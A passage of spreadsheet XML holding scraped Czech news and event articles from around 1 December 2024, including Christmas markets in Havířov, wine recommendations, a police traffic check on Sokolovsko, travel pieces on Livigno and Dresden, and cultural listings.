hodili dírou vysekanou v ledu do Něvy . Když druhý den mrtvé tělo z řeky vylovili, podle odřených prstů se dalo usoudit, že i po vhození do ledové vody Rasputin ještě žil a snažil se vydrápat ven. Tři měsíce po smrti Grigorie Rasputina vypukla v Rusku revoluce. Carskou rodinu bolševici v Jekatěrinburgu povraždili. Tak se naplnilo Rasputinovo proroctví, že po jeho smrti monarchie nepřežije. Stejně tak varoval cara před vstupem do války, protože ji prohraje. Carevna přikázala, aby jejího miláčka pohřbili se všemi poctami v Carském Selu. Dlouho si klidu neužil, protože už za rok jeho tělo dav vykopal a spálil na hranici. Autor: Jan Valtr Autor Jan Valtr</t>
  </si>
  <si>
    <t>20241201_31_3483124467_cce31793afe6a2799faa.html</t>
  </si>
  <si>
    <t>cce31793afe6a2799faa</t>
  </si>
  <si>
    <t>V Havířově začaly tradiční vánoční trhy. Těšit se můžete na bohatý kulturní program</t>
  </si>
  <si>
    <t>V Havířově začaly tradiční vánoční trhy. Těšit se můžete na bohatý kulturní program Vojtěch Tesař Program vánočních trhů v Havířově Zdroj: Městské kulturní středisko Havířov Havířov - Na Náměstí Republiky v Havířově začaly 29. 11. tradiční vánoční trhy. Lákají na bohatý kulturní a doprovodný program, stánky s občerstvením a ukázkou vánočních zvyků. Vánoční městečko na havířovském náměstí najdete od 29.11. až do 22.12. Program trhů byl zahájen ohňostrojem. Náměstí dominuje jedle, která je vysoká 35 metrů a organizátoři ji sem dovezeli z nedaleké Prostřední Suché. Jedle pochází ze zahrady rodinného domu. Kvůli její výšce však hrozilo, že by mohlo dojít k jejímu pádu. Jedle byla tedy musela být pokácena, organizátoři vánočních trhů toho využili a umístili ji na havířovské náměstí jako vánoční strom. Náměstí lemuje řada stánků, které nabízejí různé vánoční ozdoby, keramiku, sýry, trdelníky, grog, punč a svařené víno . U jiných stánků si návštěvníci mohou prohlédnout ukázky tradičních vánočních zvyků, jako je třeba lití olova. Na náměstí se také nachází městký betlém, zvonička se schránkou na poštu pro Ježíška nebo také živý zvěřinec. Na letošních vánočních trzích vystoupí také řada známých i méně známých kapel a zpěváků. Z kapel vystoupí třeba Mňága a Žďorp, Jelen a Rybičky 48. Ze zpěváků vystoupí Pokáč, Tereza Mašková , Bohuš Matuš , Pavel Callta a Lenny. Zobrazeno 262 krát Autor: Vojtěch Tesař Autor person Vojtěch Tesař</t>
  </si>
  <si>
    <t>441</t>
  </si>
  <si>
    <t>505</t>
  </si>
  <si>
    <t>20241201_310_3474578649_1d1bf3e5828860e82a30.html</t>
  </si>
  <si>
    <t>1d1bf3e5828860e82a30</t>
  </si>
  <si>
    <t>Dobrá vína, která stojí za ochutnání: Skvělá červená z Velkopavlovicka</t>
  </si>
  <si>
    <t>Dobrá vína , která stojí za ochutnání: Skvělá červená z Velkopavlovicka 30. 11. 2024 I tento týden pokračujeme „na červené vlně". Tato červená vína , která dostala vysoká hodnocení od našich vínomilců, si pozornost určitě zaslouží. A není asi náhodou, že pocházejí z velkopavlovické podoblasti, která je zkrátka baštou červených vín. Tím spíše v těchto časech, kdy jim prospívá nejen počasí, ale také stále se prohlubující zkušenosti a um vinařů. Tip vínomilců – Svatovavřinecké 2017 pozdní sběr, Vít Sedláček Začínáme vinařstvím z nejslavnějších, alespoň ve spojitosti s červenými víny. Ostatně sídlí v Modrých horách ve Vrbici, takže předpoklady pro skvělá červená má jen ty nejlepší. Nás letos výrazně příjemně překvapila i bílá vína , ale v segmentu těch červených už je Vít Sedláček velmi uznávaným producentem. Přitom není podbízivý a dokáže jít proti proudu. Vína dává na trh až pořádně uleželá a soustředí se na původní mnohdy složité odrůdy. O to více překvapuje, jakých kvalit v jeho rukou dosahuje třeba takový Cabernet Moravia, André nebo právě Svatovavřinecké. To už výjimečnost několikrát dokázalo. Ročník 2018 zvítězil v našem redakčním testu odrůdy v roce 2022, ročník 2016 obdržel velkou zlatou medaili na nominační soutěži v roce 2019. A co ročník 2017 mezi nimi? Minulý týden jej ohodnotil Jonas_ďábel: „Krásně plné a harmonické vino. V chuti višně a čokoláda. Vino je krásně aromatické, sud dodává chuti jemnou vanilku. 13 % alkoholu chuť neruší. Skutecně povedé víno , doporučuji," napsal ke svému 90bodovému hodnocení. Tip vínomilců – Merlot 2021 zemské víno , Rodinné vinařství M&amp;amp;M Rusňák V oblasti Modrých hor zůstaneme i druhým vínem . Jen se přesuneme „pod kopec" do Kobylí. A také k mnohem modernější odrůdě. Merlot byl do státní odrůdové knihy zapsán až šedesát let po Svatovavřineckém. V současné době nejvysazovanější modrá odrůda se při chladnějším počasí dlouho nemohla do tuzemských vinohradů prosadit, nyní prožívá ale nevídaný boom. Za posledních deset let jeho rozlohy stouply o více než 75 %. I když početně u Rusňákových dominují vína bílá, stojí za to se u nich zaměřit na zajímavá červená, která produkují ve výborné kvalitě. A vedle u nás tradičnějších odrůd v jejich portfoliu nechybí ani moderní Merlot. „Výrazná, čistá, koncentrovaná, kořenitě ovocná vůně pojí aromatické koření s marmeládou z třešní a višní, švestkovým kompotem i jemným nádechem čokolády. Po chvíli, kdy se jednotlivé vrstvy vůně spojily v celek, jsem pochopil, co vlastně cítím: hutný ovocný koláč. Ano, to je nejpřesnější vyjádření vůně. Elegantní, plná, harmonická, hladká a hebká chuť, přináší v jemných dotycích vše z vůně, jemné taniny, lehčí, ale příjemně šťavnatá kyselinka i vyšší alkohol jsou nádherně integrovány do celku, vytváří dojem višňového likéru. Velmi příjemný, neskutečně dlouhý závěr," charakterizoval jej framel. Zasloužil si od něj 87 bodů. Tip vínomilců – Frankovka 2021 výběr z hroznů, Libor Veverka Čejkovice sice s Vrbicí sousedí, do modrohorského mikroregionu se už ale nepočítají. Přesto zde mají červená vína vysokou kvalitu. Zdejší vinaři si jako signifikantní modrou odrůdu zvolili Pinot noir, ale najdeme tu i skvělé Frankovky nebo kabernetové odrůdy. Jedním z vinařů, který dokáže zaujmout (nejen) červenými víny, je Libor Veverka. Proslavil se zejména svým Pinotem noir, Neronetem a Cabernetem Sauvignon a trochu neprávem zůstává opomenuta jeho Frankovka. Přitom v jeho podání patří v posledních letech k vůbec nejlepším vínům této odrůdy na Moravě . Ročník 2021 dostal po třech letech opět přívlastek výběru z hroznů a vyšší cukernatost při sběru se projevila i vyšším obsahem alkoholu . To ale podle všeho nijak neruší celkové vyznění vína . „Aroma vína je vrstevnaté, plné, zpočátku animální a zemité tóny, nasládle kořenité, višně v čokoládě, sušené třešně, zavařenina. Středně plné, tak akorát šťavnaté tělo, zralé peckoviny a jejich pecky, lesní plody, kořenitost, doteky dřeva, třešňový likér a delší harmonický závěr. Výborně zpracovaná Frankovka, noblesní podání, elegance a komplexnost. Mimořádný celkový zážitek," liboval si na ní Davinpak. A tak má od něj tato Frankovka první nadšené hodnocení v naší databázi ve výši 91 bodů. Chcete vědět, co zrovna ochutnáváme my nebo jaké větší články pro vás chystáme? Staňte se našimi fanoušky na Herohero! 87 Autor: MojeLahve.cz Rubrika transition_slide Jídlo a pití</t>
  </si>
  <si>
    <t>20241201_311_3473709610_e1c34e7f7366e992734d.html</t>
  </si>
  <si>
    <t>e1c34e7f7366e992734d</t>
  </si>
  <si>
    <t>Bezpečnostní akce na Sokolovsku. Policisté zkontrolovali téměř 350 vozidel</t>
  </si>
  <si>
    <t>Bezpečnostní akce na Sokolovsku. Policisté zkontrolovali téměř 350 vozidel Při dopravně bezpečnostních akcích na Sokolovsku kontrolovali policisté bezmála350 aut. Do dvou akcí bylo zapojeno celkově 32 policistů z pořádkové a dopravní policie. Foto z policejního videa „V rámci prevence a zvýšení bezpečnosti na silnicích se na Sokolovsku uskutečnily během listopadu dvě bezpečnostní akce s názvem „ÚZÁVĚR“, uvedl policejní mluvčí Jakub Kopřiva . „Tyto akce se konaly 15. a 22. listopadu 2024 a byly zaměřeny na kontrolu dodržování zákazu jízdy pod vlivem alkoholu a jiných návykových látek, maření výkonu úředního rozhodnutí a dodržování dalších pravidel silničního provozu, doplnil. „V pátek 15. listopadu bylo zkontrolováno 148 vozidel, přičemž bylo zjištěno 24 dopravních přestupků, z nichž 22 bylo vyřešeno příkazem na místě, tedy blokovou pokutou. Policisté také zadrželi jednu osobu hledanou v rámci Schengenského informačního systému (SIS) a řešili jeden případ, kdy byl řidič pod vlivem alkoholu , upřesnil mluvčí s tím, že o týden později, tedy v pátek 22. listopadu, bylo zkontrolováno 196 vozidel a policisté řešili 31 dopravních přestupků, kdy 29 z nich bylo vyřešeno příkazem na místě. I během této akce policisté řešili jednoho řidiče pod vlivem alkoholu . V těchto cílených bezpečnostních akcích budou policisté pokračovat i nadále. Foto z policejního videa Autor: admin Rubrika transition_slide Krimi</t>
  </si>
  <si>
    <t>841</t>
  </si>
  <si>
    <t>20241201_312_3473522256_f14c6fc087d732260abd.html</t>
  </si>
  <si>
    <t>f14c6fc087d732260abd</t>
  </si>
  <si>
    <t>Akce na hradě: Vánoční svařák</t>
  </si>
  <si>
    <t>Akce na hradě: Vánoční svařák Kdy: 14. 12. 2024 10:00 Kde: Státní hrad Šternberk V sobotu 14. prosince 2024 bude možné zakoupit na horním nádvoří hradu Šternberk nejlepší vánoční svařák z rodinného vinařství Martin Novák. Hrad bude otevřený od 10 do 15 hodin a po celý den budou probíhat také vánoční prohlídky hradu s hudbou. Typ akce: gastronomie (degustace vín), ostatní (akce pro veřejnost) Věříme, že prodej kvalitního moravského vína pomůže navodit správnou vánoční atmosféru na šternberském hradě. Další informace se dozvíte na webu https://www.hrad-sternberk.cz/cs. Akce na hradě: Vánoční svařák 1 Státní hrad Šternberk , Horní náměstí 6, Šternberk , 78501 Státní hrad Šternberk Datum vložení: 6. 11. 2024 10:26 Datum poslední aktualizace: 6. 11. 2024 10:37 Autor: Bohumil Návrat Sledujte informace z našeho webu v mobilní aplikaci – V OBRAZE. Exporty do RSS Autor: Bohumil Návrat Autor person Bohumil Návrat</t>
  </si>
  <si>
    <t>711</t>
  </si>
  <si>
    <t>20241201_313_3473507286_828d6d05d999343ded94.html</t>
  </si>
  <si>
    <t>828d6d05d999343ded94</t>
  </si>
  <si>
    <t>Advent v Livignu: Tradiční oslavy a kouzlo Vánoc v srdci italských Alp</t>
  </si>
  <si>
    <t>Advent v Livignu: Tradiční oslavy a kouzlo Vánoc v srdci italských Alp 01.12.2024 \\ Tip na výlet Malebné alpské městečko Livigno se během adventu mění v doslova pohádkovou destinaci. Přestože většina návštěvníků v zimě přijíždí primárně za sjezdovkami a výhodnými nákupy, místní obyvatelé o Vánocích dodržují několik tradic, které dodávají tomuto období nezapomenutelnou sváteční atmosféru. Jaké zážitky tady na vás čekají? Pokud se na začátku prosince vydáte do Livigna , pravděpodobně to bude za lyžováním. Češi jsou totiž zvyklí, že Livigno od 30. listopadu do 20. prosince 2024 nabízí při minimálním pobytu 4 noci v hotelu (3 dny lyžování) nebo 7 nocí v apartmánu (6 dní lyžování) skipasy zdarma. Celodenní lyžování na svazích může být náročné, a tak chvíle strávené v pohádkové vánoční atmosféře určitě přijde vhod. Kouzelná vánoční vesnička Srdcem adventních oslav v Livignu je vánoční trh, který najdete na hlavní nákupní třídě. Dřevěné chaloupky nabízejí nejen lokální delikatesy, ale také ručně vyráběné ozdoby, svíčky a další doplňky, které mohou být ideálním dárkem pod stromeček. Údolím se line vůně pečených kaštanů, svařeného vína , známého pod jménem Vin Brulè, a tradičních vánočních sladkostí, ke kterým patří například italský dort panettone, pečené kaštany nebo jablečné fritters se skořicí. Pokud hledáte originální vánoční dárky, jste na správném místě. Město je známé svou bezcelní zónou, která má historické kořeny. V roce 1805 zavedením celní výjimky Napoleon Bonaparte umožnil rozvoj tohoto systému, který pokračoval pod Habsburky, Italy a nakonec i Evropským hospodářským společenstvím . Dnes je Livigno oblíbené nejen pro lyžování, ale i pro nákupy bez celních poplatků. Návštěvníci si zde pořizují hlavně oblečení, kosmetiku, parfémy nebo zimní výbavu. Vánoce začínají dnem svaté Lucie V Itálii ještě donedávna nenosil dárky Ježíšek, ale svatá Lucie . Tento svátek se připomíná 13. prosince a je spojený s legendou o světici, která žila před více než 1700 lety. Svatá Lucie pocházela z bohaté syrakuské rodiny, ale její život se změnil, když se rozhodla věnovat pomocí chudým a zachovat si panenství. Za tuto volbu byla mučena, nikdy ovšem neztratila svou víru. V mnoha italských regionech, včetně Livigna , se na svatou Lucii vzpomíná zejména v noci z 12. na 13. prosince, kdy obchází se svým oslíkem domy a schovává po různých koutech drobné sladkosti, ovoce a dárky pro hodné děti. Podobně jako u nás oznamuje příchod Ježíška s dárky zvonění zvonku, tak i v Itálii ohlašoval příchod svaté Lucie zvonek. Děti přitom nesměly svatou Lucii vidět, protože ten, kdo byť ji jen jedním pohledem spatřil, nedostal podle pověsti nic. Dnes je tento významný den spojený v celé Itálii s řadou církevních oslav. Štědrovečerní večeře, která zasytí i zahřeje Štědrovečerní večeře v Livignu , stejně jako v celé oblasti Lombardie a Alpách, je také v lecčem výjimečná. Pokrmy jsou zde hutné a vydatné, protože během dlouhých a chladných zimních večerů bylo třeba jídlem nejen zasytit, ale také dodat potřebnou energii i teplo. Mezi tradiční jídla, která na vánoční tabuli v Livignu nesmí chybět, patří pizzoccheri – těstoviny z pohankové mouky, podávané s bramborami, zelím, česnekem, máslem a strouhaným sýrem Casera, místní lahůdkou. Další oblíbený pokrm je brasato al vino, hovězí maso pomalu dušené v červeném víně, které se podává s bohatou omáčkou a bramborami nebo polentou. Vzhledem k dlouhým a náročným zimám zde nechybí ani hutné polévky, jako například minestrone nebo luštěninová zupa di legumi. Důležitou součástí tabule je také vánoční pečivo. V Livignu je oblíbený panettone, sladký chlebíček plněný rozinkami a kandovaným ovocem. Na závěr večera se pak podává teplý likér, například oblíbená grappa. Adventní procesí a mše V Livignu, stejně jako v mnoha dalších alpských regionech, se Vánoce neobejdou bez tradičních vánočních mší a adventních procesí. Tou nejtypičtější je půlnoční mše, která se koná na Štědrý večer 24. prosince.</t>
  </si>
  <si>
    <t>20241201_314_3473505355_52c8cded63b2d8a8becc.html</t>
  </si>
  <si>
    <t>52c8cded63b2d8a8becc</t>
  </si>
  <si>
    <t>Když v Drážďanech na pivo (nebo jiný drink), tak do Neustadtu</t>
  </si>
  <si>
    <t>Když v Drážďanech na pivo (nebo jiný drink), tak do Neustadtu V těchto dnech a týdnech míří kroky návštěvníků Drážďan na široko daleko vyhlášené vánoční trhy. Pokud v saské metropoli strávíte víkend nebo alespoň jednu noc a budete přemýšlet co s načatým večerem, vydejte se na průzkum party čtvrti Neustadt . Na pravém břehu Labe přímo naproti drážďanskému Altstadt neboli starému městu s historickým centrem a nejznámějšími památkami se prostírá čtvrť Neustadt , tedy nové město. Toto sousedství se od nepaměti jmenovalo Altendresden (Staré Drážďany ), avšak po rozsáhlém požáru ve druhé polovině 17. století bylo postupně renovováno a získalo svůj nový název. Při barokní přestavbě vznikly kolem bulváru Königstrasse velkorysé ulice a náměstí, jejichž struktura zůstala více méně zachována dodnes. Vstupní branou do této části města je náměstí Neustädter Markt s nepřehlédnutelnou jezdeckou sochou saského kurfiřta a polského krále Fridricha Augusta I. , který se označuje také jako August II. Silný / August der Starke. VÁNOCE O SVÁTCÍCH: Vánoční trh Štrýclmark Za ní začíná třída Hauptstrasse, která vás přivede až do srdce Neustadtu . Současné podoba živé čtvrti s originálním stylem je výsledkem vkusného propojení původních/zrestaurovaných a nových domů, mezi kterými vede hustá síť ulic, úzkých uliček a bezpočet nenápadných průchodů a dvorů. Hustota restaurací na kilometr čtvereční je bezkonkurenční: podniky všech myslitelných druhů a národních kuchyní ze všech kontinentů doplňují kavárny, fast-foody, kluby, hospody, bary a baříky i večerky. A mezi tím vším jsou rozesety rozmanité obchůdky s uměleckými artefakty, jenž kosmopolitní čtvrti, která je zároveň centrem alternativní kultury, dodávají bohémskou atmosféru. ČTĚTE TAKÉ K TEMATU: Před Vánoci vlakem do Drážďan Než najdete podnik podle svého gusta, doporučujeme trochu se projít a naladit se na atmosféru. Určitě zajděte do pasáže Kunsthof na Görlitzer Strasse , courněte se po Alaunstrasse a Louisenstrasse , ověřte si program Kulturzentrum Scheune . Co se týká hudby, nečekejte žádný mainstream, objevíte naopak spíše méně provařené žánry, třeba jazz (vyhlášený bar Blue Note ). A pokud se zdržíte, žádný problém - Neustadt vyhlášený bujarým nočním životem je dobře propojený hromadnou dopravou s ostatními částmi města. Do Drážďan vlakem Do saské metropole vypravují České dráhy komfortní vlaky EuroCity, které z Prahy jezdí ve dvouhodinovém intervalu od 6:28 do 18:28 hod a pokračují dále ve směru na Berlín a sever Německa . V odpolední špičce jezdí také Railjet: začíná už v Grazu a pokračuje přes Vídeň , Brno a Pardubice ; z Prahy vyráží v 17:31 hod. V opačném směru míří vlaky také po dvou hodinách od 7:10 do 19:10 hod, ráno ještě navíc Railjet v 8:10 hod. Dvě soupravy jezdí po trase z Hamburku přes Berlín a Drážďany do Prahy a dále přes Brno do Bratislavy a Budapešti . V letní sezoně České dráhy vypravují ještě další dvě soupravy mezi Prahou , Drážďany a Berlínem , ve večerních hodinách ve směru do Berlína a časně ráno zpět do Prahy . Aktuálně národní dopravce nasazuje na dvou párech vlaků EC zbrusu nové soupravy ComfortJet. Nejvýhodnější jízdenky jsou k dostání v e-shopu ČD , jedním směrem stojí od 258 korun. Zobrazit místo Turistika na větší mapě Města na Horydoly Annecy ( Francie ) Bardejov ( Slovensko ) Bardo ( Polsko ) Basilej ( Švýcarsko ) Belfast ( Irsko ) Berlín ( Německo ) Bern ( Švýcarsko ) Brémy ( Německo ) Brixen ( Itálie ) Brno Výstaviště ( Česko ) Brusel ( Belgie ) Budapešť ( Maďarsko ) Bukurešť ( Rumunsko ) Curych ( Švýcarsko ) Český Brod ( Česko ) Darney ( Francie ) Delft ( Nizozemsko ) Drážďany ( Německo ) Drážďany Neustadt ( Německo ) Edinburgh ( Velká Británie ) Florencie ( Itálie ) Frýdek-Místek ( Česko ) Chrudim ( Česko ) Kadaň ( Česko ) Kodaň ( Dánsko ) Kolín ( Česko ) Košice ( Slovensko ) Krakov ( Polsko ) Kutná Hora ( Česko ) Lanškroun ( Česko ) Lausanne ( Švýcarsko ) Londýn East End ( Velká Británie ) Londýn a fotbal ( Velká Británie ) Londýn na kole ( Velká Británie ) Lucca ( Itálie ) Luzern ( Švýcarsko ) Lyon ( Francie ) Manchester ( Velká Británie ) Mikulov ( Česko ) Most ( Česko ) Negri ( Jamajka ) Ostřihom ( Maďarsko ) Paczkow ( Polsko ) Piešťany ( Slovensko ) Pirna ( Německo ) Pisa ( Itálie ) Prachatice ( Česko ) Přemyšl ( Polsko ) Příbram ( Česko ) Reykjavík ( Island ) Řím ( Itálie ) Skopje ( Makedonie ) Slavkov u Brna ( Česko ) Starý Smokovec ( Slovensko ) Teplice ( Česko ) Trutnov ( Česko ) Uherské Hradiště ( Česko ) Veszprém ( Maďarsko ) Vídeň japonská zahrada ( Rakousko ) Ženeva ( Švýcarsko ) Autor: Roman Zvarič Autor person Roman Zvarič</t>
  </si>
  <si>
    <t>1770</t>
  </si>
  <si>
    <t>1290</t>
  </si>
  <si>
    <t>20241201_315_3473504860_f7cca210503e99519820.html</t>
  </si>
  <si>
    <t>f7cca210503e99519820</t>
  </si>
  <si>
    <t>Maxipes Fík | 01.12.2024 - Český Krumlov</t>
  </si>
  <si>
    <t>Maxipes Fík | 01.12.2024 - Český Krumlov KDE JSEM Kalendář akcí 01.12.2024 Český Krumlov Maxipes Fík Maxipes Fík Datum: 01.12.2024 od 15:00 hod. Místo: Městské divadlo, Horní 2, 381 01 Český Krumlov Cena: 160 Podle literární předlohy Rudolfa Čechury a Jiřího Šalamouna . Tatí, já byfem chtěla pfa.'' řekla Ája. Tak jí tatínek koupil psa. “Jmenuje se Rek'' oznámil. A protože Ája neuměla říkat R, říkala mu Fek. „To už mu můžeme říkat Fík“ řekl tatínek. No a tak to všechno začalo. Z malého pejska vyrostl velký pes Fík a z malého dobrodružství začalo velké. A že je to pes neobyčejný? No, který pes se dostane až do školy, kde se naučí psát a počítat? Nebo dojde páníčkovi pro pivo , dostane angažmá v cirkusu? Viděli jste někdy psa, který řídí auto? Dokonce se vydá do světa skoro až na kraj světa a objeví spoustu věcí a potká spoustu lidí a má po celém světě kamarády, protože s Fíkem zažije každý moc legrace. Ale jak se říká všude dobře doma nejlíp. Moc rád se vrátí domů a zdají se mu velice divoké psí sny, dokonce i o Vánocích. Jak to všechno s Fíkem bylo? To se uvidí! „Tak neváhejte a přijďte. Bude psina! Haf!“ Autor: Zdeněk Tomeš, Michaela Sajlerová Režie: Zdeněk Tomeš, Michaela Sajlerová Hrají: Zdeněk Tomeš, Michaela Sajlerová/Veronika Koloušková, Kryštof Nohýnek / Václav Krátký, Patrik Vojtíšek/ Václav Rašilov Pohádka je vhodná pro děti od 4 let. Délka představení: cca 60 minut bez přestávky. Více o akci Maxipes Fík na webu akce</t>
  </si>
  <si>
    <t>361</t>
  </si>
  <si>
    <t>193</t>
  </si>
  <si>
    <t>20241201_316_3473499996_ce9fcda9af02d8ff81c3.html</t>
  </si>
  <si>
    <t>ce9fcda9af02d8ff81c3</t>
  </si>
  <si>
    <t>JOŽA MRÁZEK HOŘICKÝ</t>
  </si>
  <si>
    <t>JOŽA MRÁZEK HOŘICKÝ Podivuhodný všeuměl přišel svět 28. března 1906 ve znamení Berana. Do matriky ho zapsali jako Josefa Mrázka, druhé příjmení zvolil později z úcty ke svému rodišti, Hořicím v Podkrkonoší . Mrázkovi se v penězích rozhodně netopili – otec byl pokrývač, matka pracovala jako tkadlena. „Poměry v rodině byly takové, že už v 11 letech věku svého jsem se musel tahat z nádraží se zavazadly. Hlad byl zmírněn,“ vykládá v televizním dokumentu z roku 1970. Školu měl rád, oblíbil si zpěv, tělocvik a čtení. Vyučil se tkalcem, ale dělal přidavače u zedníků, cirkusáka, dlaždiče, čeledína, kočího etc. po Čechách . Už v devatenácti letech pózoval na hořické sochařské škole u profesorů Suchomela a Kociána, což ho bavilo. Když přišel do Prahy , uplatnil se počínaje rokem 1929 jako zajímavý typ na UMPRUM, v Akademii výtvarných umění i v soukromých ateliérech. Podle svých slov stál Karlu Pokornému modelem pro sochu Aloise Jiráska . Tenhle „boží člověk“, součást výtvarnického inventáře, měl asi jako jediný v republice v dokladech uvedeno povolání „model – umělec“. Sám sobě pak udělil neodolatelný titul "modelissimus". Od konce let třicátých se výtvarnému umění věnoval rovněž aktivně. První výstavu měl v pražské Nové síni s malířem Daliborem Pokorným v devětašedesátém. Jeho naivní, ale upřímná dílka si našla příznivce i mezi intelektuály. Obraz Král Karel IV. poslouchá proroctví byl dokonce součástí české expozice na EXPO v Montrealu . Vystavoval samostatně nebo kolektivně v Olomouci , Brně , Jihlavě , Praze , Pezinku , Hodoníně . V neposlední řadě proslul Joža Mrázek Hořický neotřelými verši. Už názvy postačí: Posmrtná vzpomínka na zemřelého bohéma, Vysoce vážený Sergeji Vasiljeviči , K jmeninám velikého budovatele socialismu... Postupem času se staly součástí sborníků Bosé nožky, Kupte si štěstí v bazaru, Kámen do voda (sic!). Pod jeho jménem vyšel titul Louskáček básní Joži Mrázka Hořického. Velký hit měl kdysi Ivan Mládek s jeho textem Krychle: Když jsem šel do Michle /tížily mě krychle/když jsem sundal krychle/tak jsem šel zas rychle. Veřejnosti ho představil Jaromil Jireš v dokumentu Srub. Nepřehlédnutelnou úlohu sehrál v podceňovaném „sochařském“ Papouškově snímku Nejkrásnější věk (1968), v němž se vrátil na půdu AVU. Jako cholerický model dvakrát úplně mimo kontext vykřikne: „Chceme mír! Chceme mír!“ A konec snímku patří zase jemu: „To se mi líbí! On je mladík těla a já jsem mladík ducha! My jsme oba mladíci. A vy všichni jste staříci! Já biju do mříže duchem a on bije do mříže tělem! A my tu mříž rozbijeme!“ Mihl se ještě v komedii Matěji, proč tě holky nechtějí? Portrét hořického „génia“, který bydlel nad restaurací v Černošicích , natočila pro TV Jana Michajlová . V bytě to vypadalo asi jako v jeho hlavě – chaos, nepořádek, jedno přes druhé. Joža se ale nestylizoval, byl o své výjimečnosti přesvědčen. („Až já doopravdy umřu, odejde se mnou jedna celá umělecká epocha.“) Bezelstně vypráví do kamery, jak na vánoční návštěvě ke štice vypil dva litry vína – „protože měl po ní žízeň“. „Jsem malíř, básník, hudebník, herec, zpěvák, recitátor, imitátor. Kam se na mě hrabe Strýček Jedlička!“ Vzápětí zakokrhá a zaštěká… Vrcholem snímku je přednes dadaistické básně, kdy Joža hraje obě úlohy: LUNA VOJÁKA Hle, luna již vychází./Tam však velitel přichází!/Soudruhu veliteli!/Viděl jsem je v jeteli,/když jsem se vám schoval./Vy jste právě obhlídku konal./Neviděl jsem vás, vojíne./Ale to si ještě povíme!/Vojáci jsou kamarádi provždycky!/Joža Mrázek Hořický Joža Mrázek Hořický, autor stále platného dvojverší Nežli dělat kýče, chop se raděj rýče, zemřel 7. prosince 1984 v Černošicích u Prahy . Autor: Administrator || OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>45</t>
  </si>
  <si>
    <t>20241201_317_3473499549_4d60e306ffad5f5eed38.html</t>
  </si>
  <si>
    <t>4d60e306ffad5f5eed38</t>
  </si>
  <si>
    <t>Národní divadlo Brno</t>
  </si>
  <si>
    <t>Shrnutí Národní divadlo Brno Janáčkovo divadlo Motto 9. ročníku festivalu Bez hranic! inspirovala právě Janáčkova pátá opera Výlety páně Broučkovy, kde se s hlavním hrdinou vydáme na Měsíc i na cestu časem do 15. století. Stejným mottem by se dala popsat i tvorba režiséra Roberta Carsena, tvůrce inscenací po celém světě ceněných pro jejich dramatické uchopení, poetiku, humor a výtvarnou vytříbenost. Cesta slavného režiséra se s dílem českého skladatele protnula před mnoha lety a dnes má Carsen na svém kontě inscenace šesti Janáčkových oper. Pro brněnský soubor vytvořil v roce 2020 inscenaci Osudu a nyní se vrací na jeviště Janáčkova divadla, aby právě jeho nová inscenace Výletů páně Broučkových slavnostně zahájila festival. Žádná z Janáčkových oper se nedá nazvat komickou; ač v nich humor nikdy nechybí, je spíše oním vzácným kořením. V opeře o domácím z Malé strany, typicky českém človíčkovi, ale Janáček humorem přímo srší, i když je tu řádně nabroušený. Janáček našel předlohu v oblíbených broučkovských novelách básníka Svatopluka Čecha a jeho satiru dokreslil hudbou v tanečním rytmu a s použitím nezvyklých nástrojů jako skleněná harmonika či dudy k dokonalosti. Jestliže první část opery, výlet na Měsíc, mířila svým břitkým humorem do řad pražských kritiků, intelektuálů a umělců, druhá polovina z doby husitské pak ťala do nepěkných vlastností českého národa obecně. Opera nevznikala lehce, Janáček vystřídal několik libretistů a trvalo devět let, než po všech peripetiích s libretem dospěl ke zdárnému konci Výletu pana Broučka do Měsíce. Na konci práce si ale povzdechl nad svými veršotepci: „Ale naši básníci! Člověk aby jim vše napověděl – a ještě to dopadne chudě!“ Přesto se vzápětí rozhodl operu rozšířit ještě o jeden díl, tentokrát o výlet do 15. století. To s libretistou F. S. Procházkou zvládli rychle, nicméně od té doby si už Janáček psal libreta sám. Proč si vlastně vybral právě Čechova pana Broučka? To krásně popsal v dopise Kamile Stösslové : „Tak víte, co to ten Brouček je? Tak zcela všední člověk; hubačí na celý svět a celý svůj život ztápí u džbánku piva . K ničemu dobrému na světě není. Ptáte se: ‚Tak proč jste si takového člověka vybral na operu?‘ Proto, aby se všem zhnusil, aby byl na posměch a aby byl výstrahou! Rusové měli takového ‚měkkého‘ člověka též; jmenoval se Oblomov. Vlastně každý druhý Rus byl Oblomovem – a kam to přivedli! Strašná revoluce teď to potoky krve čistí. Proto Broučka vystavuji – na výstrahu. Je též u nás těch Broučků na všech stranách dost a dost! Jen žaludek je jim vším. Tak můj milý Brouček se zase opije, kdesi na Hradčanech usne a zdá se mu sen: Let í na měsíc! Padne tam. Ó, hrůza! Tamější lidé sytí se jen vůní květů. Dávají Broučkovi jen ku květům čichat. A teď se tam do něho zamiluje jedna Měsíčanka! Bez krve, tělo jako koudel!“ Autor: Pilot v.o.s. || webdesign PILOT | Platforma aPilot</t>
  </si>
  <si>
    <t>730</t>
  </si>
  <si>
    <t>266</t>
  </si>
  <si>
    <t>20241201_318_3473493414_132c8a618267defbc81f.html</t>
  </si>
  <si>
    <t>132c8a618267defbc81f</t>
  </si>
  <si>
    <t>Kalendarium 27.února - čtvrtek od 19:00 hodin Kulturní akce dne: 03. 12. 2024 2024-12-02 08:00:00 2024-12-20 18:00:00 VÁNOCE V EVROPĚ 03.prosinec - úterý od 08:00 hodin Prohlédněte si ručně vyrobené ozdobičky od žáků ze škol napříč Evropskou unií a zjistěte, jak se u nich slaví Vánoce. Spolufinancováno EU. Vstup volný. 03.prosinec - úterý od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. 03.prosinec - úterý od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. Conclave 03.prosinec - úterý od 10:00 hodin Kardinál Lawrence je pověřen vedením jedné z nejtajnějších a nejstarších událostí na světě - volbou nového papeže, při níž se ocitá v centru spiknutí, které by mohlo otřást samotnými základy církve. 80 vstupné 80 Kč | Velký sál | Bio Central Velký sál 